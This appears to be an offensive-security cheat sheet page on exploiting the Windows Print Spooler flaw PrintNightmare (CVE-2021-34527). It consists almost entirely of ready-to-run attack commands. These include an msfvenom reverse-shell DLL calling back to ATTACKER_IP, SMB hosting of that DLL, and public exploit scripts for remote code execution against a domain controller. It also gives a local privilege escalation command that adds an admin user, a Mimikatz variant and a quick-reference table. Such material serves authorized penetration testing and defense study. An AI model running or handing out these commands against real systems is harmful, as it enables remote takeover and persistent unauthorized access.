Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

CVE-2021-34527. Load malicious DLL via Print Spooler service. Variants: RCE (remote) and LPE (local privilege escalation).

Check Spooler Running

impacket-rpcdump DC_IP | grep -i "spoolsv\|MS-RPRN"

Get-Service Spooler
ls \\DC_IP\pipe\spoolss

RCE — Remote

Host DLL

# Generate DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Host via SMB
impacket-smbserver share . -smb2support

Exploit

# https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py DOMAIN/user:password@DC_IP '\\ATTACKER_IP\share\evil.dll'

LPE — Local Privilege Escalation

# https://github.com/calebstewart/CVE-2021-1675
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -DriverName "PrintMe" -NewUser "hacker" -NewPassword "Password123!"
Adds local admin user.

Mimikatz Method

misc::printnightmare /server:DC_IP /library:\\ATTACKER_IP\share\evil.dll

Quick Reference

TaskCommand
Check spoolerrpcdump DC_IP | grep spoolsv
RCECVE-2021-1675.py DOMAIN/user:pass@DC '\\ATK\share\evil.dll'
LPEInvoke-Nightmare -NewUser hacker -NewPassword Pass123!